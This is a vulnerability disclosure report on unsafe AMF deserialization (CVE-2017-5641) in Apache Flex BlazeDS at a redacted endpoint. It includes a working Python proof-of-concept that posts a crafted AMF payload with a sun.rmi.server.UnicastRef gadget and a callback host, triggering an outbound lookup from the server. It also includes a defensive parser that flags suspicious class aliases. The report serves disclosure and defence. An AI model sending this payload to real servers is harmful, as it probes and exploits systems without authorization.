[HTAF4-213] [Pre-submission] Unsafe AMF deserialization (CVE-2017-5641) in Apache Flex BlazeDS at the https://www.███████/daip/messagebroker/amf
Critical
Vulnerability Details
## Description
We identified a potential unsafe deserialization vulnerability on the `https://www.█████/daip/messagebroker/amf` endpoint.
## POC
To rule out a false positive and show that the pingback is the result of AMF deserialization, and not a reaction to the external host in the POST body, first send this request:
```
POST /daip/messagebroker/amf HTTP/1.1
Host: www.███████
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
Content-Type: application/x-amf
Content-Length: 51
<your collaborator host>
```
Nothing will happen. You will receive something like this:
███
You can wait a few minutes to ensure that nothing is coming.
Next, send the collaborator host inside the serialized AMF payload using this script, e.g. `script.py <collaborator> 80`:
```
import struct
import sys
import requests

if len(sys.argv) != 3:
    print("Usage: script.py <callback host> <callback port>")
    sys.exit(1)

callback_ip = sys.argv[1].encode()
callback_port = int(sys.argv[2])

# AMF0 envelope (version 3, no headers, one message with empty target/response URIs,
# body length unknown), then the AVM+ marker 0x11 switching the body to AMF3, an
# object marker 0x0a, traits byte 0x07 (inline, externalizable) and 0x33, the
# U29-encoded length of the 25-character class name that follows.
amf_payload = (b'\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a'
               b'\x07\x33' + b'sun.rmi.server.UnicastRef'
               + struct.pack('>H', len(callback_ip)) + callback_ip   # host the server resolves
               + struct.pack('>I', callback_port)
               + b'\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00')

url = "https://www.███████/daip/messagebroker/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)
```
This will result in a significant delay, and soon you will get the pingback from the ███/███ IP.
This indicates that the backend server deserialized the AMF data and triggered a DNS lookup (there won't be an HTTP request, since `sun.rmi.server.UnicastRef` doesn't communicate via HTTP).
## Suggested fix
Update the Apache Flex BlazeDS library.
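For defenders inspecting traffic to an AMF endpoint, the useful signal is the class alias of the top-level object in the request body, which the envelope above exposes before any deserialization happens. The following is an added example, not code from the report or from BlazeDS: it decodes just enough of the AMF0 envelope and AMF3 object prefix to pull out that alias and flags anything outside a hypothetical deployment allow-list. The sample bodies are constructed (the first reuses the report's envelope prefix with a placeholder tail), and `ALLOWED_CLASSES` is an assumed list, not BlazeDS's own.

```python
import struct

# Hypothetical allow-list of class aliases this deployment expects in AMF bodies.
ALLOWED_CLASSES = {"flex.messaging.io.ArrayCollection", "flex.messaging.messages.CommandMessage"}

# Constructed samples: AMF0 envelope, AVM+ switch (0x11), AMF3 object (0x0a), traits 0x07,
# then a U29 string header (length << 1 | 1) and the class alias, followed by a dummy tail.
_ENVELOPE = b'\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a\x07'
SUSPICIOUS_BODY = _ENVELOPE + b'\x33' + b'sun.rmi.server.UnicastRef' + b'\x00' * 8
BENIGN_BODY = _ENVELOPE + bytes([len(b'flex.messaging.io.ArrayCollection') << 1 | 1]) \
    + b'flex.messaging.io.ArrayCollection' + b'\x00' * 8

def read_u29(buf, pos):
    """Decode an AMF3 U29 variable-length integer; returns (value, next offset)."""
    value = 0
    for i in range(4):
        byte = buf[pos]
        pos += 1
        if i == 3:                      # fourth byte carries a full 8 bits, no continuation flag
            return (value << 8) | byte, pos
        value = (value << 7) | (byte & 0x7f)
        if not byte & 0x80:
            return value, pos

def amf3_top_level_class(body):
    """Return the class alias of the first AMF3 object in an AMF0 envelope, or None."""
    try:
        version, header_count = struct.unpack_from(">HH", body, 0)
        if version not in (0, 3) or header_count != 0:     # headers are not handled here
            return None
        (message_count,) = struct.unpack_from(">H", body, 4)
        pos = 6
        if message_count < 1:
            return None
        for _ in range(2):              # skip target URI and response URI (u16 length + bytes)
            (length,) = struct.unpack_from(">H", body, pos)
            pos += 2 + length
        pos += 4                        # body length field (0xffffffff = unknown) is not needed
        if body[pos] != 0x11 or body[pos + 1] != 0x0a:     # must switch to AMF3 and open an object
            return None
        traits, pos = read_u29(body, pos + 2)
        if traits & 0x03 != 0x03:       # object reference or traits reference: no inline alias
            return None
        name_ref, pos = read_u29(body, pos)
        if not name_ref & 0x01:         # string reference, alias was defined earlier
            return None
        return body[pos:pos + (name_ref >> 1)].decode("utf-8", "replace")
    except (struct.error, IndexError):
        return None

def deserialization_risk(content_type, body, allowed=ALLOWED_CLASSES):
    """Classify a request for a detection pipeline: (class alias, flagged)."""
    if content_type != "application/x-amf":
        return None, False
    alias = amf3_top_level_class(body)
    return alias, alias is not None and alias not in allowed
```

A WAF or proxy hook can call `deserialization_risk` on each `application/x-amf` request and alert on the flagged aliases, which catches the JDK RMI alias used in this report without needing to understand the gadget tail.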
## Impact
Unsafe deserialization of AMF data.
We will work on this and try to improve impact, if possible.
Report Stats
- Report ID: 728614
- State: Closed
- Substate: resolved
- Upvotes: 27